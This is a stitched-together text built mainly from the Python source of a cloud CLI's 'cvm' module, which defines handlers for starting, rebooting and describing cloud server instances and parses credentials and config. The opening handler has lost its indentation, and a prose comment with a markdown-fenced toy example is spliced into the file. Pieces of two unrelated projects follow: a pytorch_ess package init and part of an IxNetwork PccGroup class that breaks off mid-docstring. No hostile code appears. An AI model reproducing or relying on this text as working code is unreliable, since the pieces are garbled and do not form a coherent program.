reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ImportImageRequest()
model.from_json_string(json.dumps(param))
rsp = client.ImportImage(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDisasterRecoverGroupAttribute(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyDisasterRecoverGroupAttribute", g_param[OptionsDefine.Version])
        return
    param = {
        "DisasterRecoverGroupId": argv.get("--DisasterRecoverGroupId"),
        "Name": argv.get("--Name"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyDisasterRecoverGroupAttributeRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyDisasterRecoverGroupAttribute(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeInstanceVncUrl(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeInstanceVncUrl", g_param[OptionsDefine.Version])
        return
    param = {
        "InstanceId": argv.get("--InstanceId"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeInstanceVncUrlRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeInstanceVncUrl(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyInstancesProject(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyInstancesProject", g_param[OptionsDefine.Version])
        return
    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "ProjectId": Utils.try_to_json(argv, "--ProjectId"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyInstancesProjectRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyInstancesProject(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doStartInstances(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("StartInstances", g_param[OptionsDefine.Version])
        return
    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.StartInstancesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.StartInstances(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDisasterRecoverGroups(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeDisasterRecoverGroups", g_param[OptionsDefine.Version])
        return
    param = {
        "DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
        "Name": argv.get("--Name"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeDisasterRecoverGroupsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeDisasterRecoverGroups(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeKeyPairs(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeKeyPairs", g_param[OptionsDefine.Version])
        return
    param = {
        "KeyIds": Utils.try_to_json(argv, "--KeyIds"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeKeyPairsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeKeyPairs(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeReservedInstancesOfferings(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeReservedInstancesOfferings", g_param[OptionsDefine.Version])
        return
    param = {
        "DryRun": Utils.try_to_json(argv, "--DryRun"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
        "MaxDuration": Utils.try_to_json(argv, "--MaxDuration"),
        "MinDuration": Utils.try_to_json(argv, "--MinDuration"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeReservedInstancesOfferingsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeReservedInstancesOfferings(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeHosts(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeHosts", g_param[OptionsDefine.Version])
        return
    param = {
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeHostsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeHosts(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAllocateHosts(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("AllocateHosts", g_param[OptionsDefine.Version])
        return
    param = {
        "Placement": Utils.try_to_json(argv, "--Placement"),
        "ClientToken": argv.get("--ClientToken"),
        "HostChargePrepaid": Utils.try_to_json(argv, "--HostChargePrepaid"),
        "HostChargeType": argv.get("--HostChargeType"),
        "HostType": argv.get("--HostType"),
        "HostCount": Utils.try_to_json(argv, "--HostCount"),
        "TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.AllocateHostsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.AllocateHosts(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeInternetChargeTypeConfigs(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeInternetChargeTypeConfigs", g_param[OptionsDefine.Version])
        return
    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeInternetChargeTypeConfigsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeInternetChargeTypeConfigs(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doRebootInstances(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("RebootInstances", g_param[OptionsDefine.Version])
        return
    param = {
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
        "ForceReboot": Utils.try_to_json(argv, "--ForceReboot"),
        "StopType": argv.get("--StopType"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.RebootInstancesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.RebootInstances(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeInstanceTypeConfigs(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeInstanceTypeConfigs", g_param[OptionsDefine.Version])
        return
    param = {
        "Filters": Utils.try_to_json(argv, "--Filters"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeInstanceTypeConfigsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeInstanceTypeConfigs(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDisassociateSecurityGroups(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DisassociateSecurityGroups", g_param[OptionsDefine.Version])
        return
    param = {
        "SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
        "InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisassociateSecurityGroupsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DisassociateSecurityGroups(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
    "v20170312": cvm_client_v20170312,
}

MODELS_MAP = {
    "v20170312": models_v20170312,
}

ACTION_MAP = {
    "DescribeImageQuota": doDescribeImageQuota,
    "StopInstances": doStopInstances,
    "DescribeInstancesStatus": doDescribeInstancesStatus,
    "ModifyImageSharePermission": doModifyImageSharePermission,
    "DescribeImageSharePermission": doDescribeImageSharePermission,
    "InquiryPriceRunInstances": doInquiryPriceRunInstances,
    "ModifyHostsAttribute": doModifyHostsAttribute,
    "DescribeImages": doDescribeImages,
    "DescribeZoneInstanceConfigInfos": doDescribeZoneInstanceConfigInfos,
    "ModifyInstancesAttribute": doModifyInstancesAttribute,
    "DescribeRegions": doDescribeRegions,
    "InquiryPriceResetInstancesInternetMaxBandwidth": doInquiryPriceResetInstancesInternetMaxBandwidth,
    "DisassociateInstancesKeyPairs": doDisassociateInstancesKeyPairs,
    "CreateKeyPair": doCreateKeyPair,
    "DeleteKeyPairs": doDeleteKeyPairs,
    "CreateDisasterRecoverGroup": doCreateDisasterRecoverGroup,
    "DescribeInstances": doDescribeInstances,
    "ImportKeyPair": doImportKeyPair,
    "AssociateInstancesKeyPairs": doAssociateInstancesKeyPairs,
    "RunInstances": doRunInstances,
    "DeleteImages": doDeleteImages,
    "InquiryPriceResizeInstanceDisks": doInquiryPriceResizeInstanceDisks,
    "TerminateInstances": doTerminateInstances,
    "ModifyInstancesVpcAttribute": doModifyInstancesVpcAttribute,
    "InquiryPriceResetInstance": doInquiryPriceResetInstance,
    "DescribeDisasterRecoverGroupQuota": doDescribeDisasterRecoverGroupQuota,
    "ResetInstancesPassword": doResetInstancesPassword,
    "PurchaseReservedInstancesOffering": doPurchaseReservedInstancesOffering,
    "ResizeInstanceDisks": doResizeInstanceDisks,
    "DescribeReservedInstances": doDescribeReservedInstances,
    "DescribeZones": doDescribeZones,
    "CreateImage": doCreateImage,
    "AssociateSecurityGroups": doAssociateSecurityGroups,
    "ResetInstancesType": doResetInstancesType,
    "ModifyImageAttribute": doModifyImageAttribute,
    "DescribeInstancesOperationLimit": doDescribeInstancesOperationLimit,
    "InquiryPriceResetInstancesType": doInquiryPriceResetInstancesType,
    "DescribeInstanceFamilyConfigs": doDescribeInstanceFamilyConfigs,
    "DeleteDisasterRecoverGroups": doDeleteDisasterRecoverGroups,
    "DescribeImportImageOs": doDescribeImportImageOs,
    "ResetInstancesInternetMaxBandwidth": doResetInstancesInternetMaxBandwidth,
    "ResetInstance": doResetInstance,
    "SyncImages": doSyncImages,
    "ModifyKeyPairAttribute": doModifyKeyPairAttribute,
    "ImportImage": doImportImage,
    "ModifyDisasterRecoverGroupAttribute": doModifyDisasterRecoverGroupAttribute,
    "DescribeInstanceVncUrl": doDescribeInstanceVncUrl,
    "ModifyInstancesProject": doModifyInstancesProject,
    "StartInstances": doStartInstances,
    "DescribeDisasterRecoverGroups": doDescribeDisasterRecoverGroups,
    "DescribeKeyPairs": doDescribeKeyPairs,
    "DescribeReservedInstancesOfferings": doDescribeReservedInstancesOfferings,
    "DescribeHosts": doDescribeHosts,
    "AllocateHosts": doAllocateHosts,
    "DescribeInternetChargeTypeConfigs": doDescribeInternetChargeTypeConfigs,
    "RebootInstances": doRebootInstances,
    "DescribeInstanceTypeConfigs": doDescribeInstanceTypeConfigs,
    "DisassociateSecurityGroups": doDisassociateSecurityGroups,
}

AVAILABLE_VERSION_LIST = [
    v20170312.version,
]

AVAILABLE_VERSIONS = {
    'v' + v20170312.version.replace('-', ''): {"help": v20170312_help.INFO, "desc": v20170312_help.DESC},
}
def cvm_action(argv, arglist):
    if "help" in argv:
        versions = sorted(AVAILABLE_VERSIONS.keys())
        opt_v = "--" + OptionsDefine.Version
        version = versions[-1]
        if opt_v in argv:
            version = 'v' + argv[opt_v].replace('-', '')
        if version not in versions:
            print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
            return
        action_str = ""
        docs = AVAILABLE_VERSIONS[version]["help"]
        desc = AVAILABLE_VERSIONS[version]["desc"]
        for action, info in docs.items():
            action_str += " %s\n" % action
            action_str += Utils.split_str(" ", info["desc"], 120)
        helpstr = HelpTemplate.SERVICE % {"name": "cvm", "desc": desc, "actions": action_str}
        print(helpstr)
    else:
        print(ErrorMsg.FEW_ARG)


def version_merge():
    help_merge = {}
    for v in AVAILABLE_VERSIONS:
        for action in AVAILABLE_VERSIONS[v]["help"]:
            if action not in help_merge:
                help_merge[action] = {}
                help_merge[action]["cb"] = ACTION_MAP[action]
                help_merge[action]["params"] = []
            for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
                if param["name"] not in help_merge[action]["params"]:
                    help_merge[action]["params"].append(param["name"])
    return help_merge
def register_arg(command):
    cmd = NiceCommand("cvm", cvm_action)
    command.reg_cmd(cmd)
    cmd.reg_opt("help", "bool")
    cmd.reg_opt(OptionsDefine.Version, "string")
    help_merge = version_merge()
    for actionName, action in help_merge.items():
        c = NiceCommand(actionName, action["cb"])
        cmd.reg_cmd(c)
        c.reg_opt("help", "bool")
        for param in action["params"]:
            c.reg_opt("--" + param, "string")
        for opt in OptionsDefine.ACTION_GLOBAL_OPT:
            stropt = "--" + opt
            c.reg_opt(stropt, "string")


def parse_global_arg(argv):
    params = {}
    for opt in OptionsDefine.ACTION_GLOBAL_OPT:
        stropt = "--" + opt
        if stropt in argv:
            params[opt] = argv[stropt]
        else:
            params[opt] = None
    if params[OptionsDefine.Version]:
        params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')

    config_handle = Configure()
    profile = config_handle.profile
    if ("--" + OptionsDefine.Profile) in argv:
        profile = argv[("--" + OptionsDefine.Profile)]

    is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
    is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
    config = {}
    cred = {}
    if is_conexist:
        config = config_handle._load_json_msg(conf_path)
    if is_creexist:
        cred = config_handle._load_json_msg(cred_path)

    if os.environ.get(OptionsDefine.ENV_SECRET_ID):
        cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
    if os.environ.get(OptionsDefine.ENV_SECRET_KEY):
        cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
    if os.environ.get(OptionsDefine.ENV_REGION):
        config[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)

    for param in params.keys():
        if param == OptionsDefine.Version:
            continue
        if params[param] is None:
            if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
                if param in cred:
                    params[param] = cred[param]
                else:
                    raise Exception("%s is invalid" % param)
            else:
                if param in config:
                    params[param] = config[param]
                elif param == OptionsDefine.Region:
                    raise Exception("%s is invalid" % OptionsDefine.Region)

    try:
        if params[OptionsDefine.Version] is None:
            version = config["cvm"][OptionsDefine.Version]
            params[OptionsDefine.Version] = "v" + version.replace('-', '')
        if params[OptionsDefine.Endpoint] is None:
            params[OptionsDefine.Endpoint] = config["cvm"][OptionsDefine.Endpoint]
    except Exception as err:
        raise Exception("config file:%s error, %s" % (conf_path, str(err)))

    versions = sorted(AVAILABLE_VERSIONS.keys())
    if params[OptionsDefine.Version] not in versions:
        raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
    return params
def show_help(action, version):
    docs = AVAILABLE_VERSIONS[version]["help"][action]
    desc = AVAILABLE_VERSIONS[version]["desc"]
    docstr = ""
    for param in docs["params"]:
        docstr += " %s\n" % ("--" + param["name"])
        docstr += Utils.split_str(" ", param["desc"], 120)
    helpmsg = HelpTemplate.ACTION % {"name": action, "service": "cvm", "desc": desc, "params": docstr}
    print(helpmsg)


def get_actions_info():
    config = Configure()
    new_version = max(AVAILABLE_VERSIONS.keys())
    version = new_version
    try:
        profile = config._load_json_msg(os.path.join(config.cli_path, "default.configure"))
        version = profile["cvm"]["version"]
        version = "v" + version.replace('-', '')
    except Exception:
        pass
    if version not in AVAILABLE_VERSIONS.keys():
        version = new_version
    return AVAILABLE_VERSIONS[version]["help"]
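# The dispatch above is fully table-driven: ACTION_MAP binds action names to
# handlers, and version_merge unions each action's parameter names across every
# entry in AVAILABLE_VERSIONS, so a single registered command accepts the flags
# of all supported API versions. The self-contained sketch below illustrates
# that merge strategy with made-up version data (not the real v20170312 help
# tables) and a simplified merge_params helper.

```python
def merge_params(available_versions):
    # Union parameter names per action across versions, preserving order
    merged = {}
    for v in available_versions:
        for action, doc in available_versions[v]["help"].items():
            names = merged.setdefault(action, [])
            for param in doc["params"]:
                if param["name"] not in names:
                    names.append(param["name"])
    return merged


# Toy data: a second, hypothetical version adds one parameter to SyncImages
toy_versions = {
    "v20170312": {"help": {"SyncImages": {"params": [{"name": "ImageIds"}]}}},
    "v20180401": {"help": {"SyncImages": {"params": [{"name": "ImageIds"},
                                                     {"name": "DestinationRegions"}]}}},
}

merged = merge_params(toy_versions)
```

With this shape, register_arg only has to walk the merged table once and register one `--Flag` option per unioned parameter name.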
# pytorch_ess/__init__.py (wjmaddox/pytorch_ess, Apache-2.0)
from .elliptical_slice import EllipticalSliceSampler
from .mean_elliptical_slice import MeanEllipticalSliceSampler
# RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/pccgroup.py (ralfjon/IxNetwork, MIT)
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PccGroup(Base):
    """The PccGroup class encapsulates a user managed pccGroup node in the ixnetwork hierarchy.

    An instance of the class can be obtained by accessing the PccGroup property from a parent instance.
    The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
    The internal properties list can be managed by the user by using the add and remove methods.
    """

    _SDM_NAME = 'pccGroup'

    def __init__(self, parent):
        super(PccGroup, self).__init__(parent)

    @property
    def LearnedInfo(self):
        """An instance of the LearnedInfo class.

        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo.LearnedInfo)

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo import LearnedInfo
        return LearnedInfo(self)

    @property
    def LearnedInfoUpdate(self):
        """An instance of the LearnedInfoUpdate class.

        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfoupdate.LearnedInfoUpdate)

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
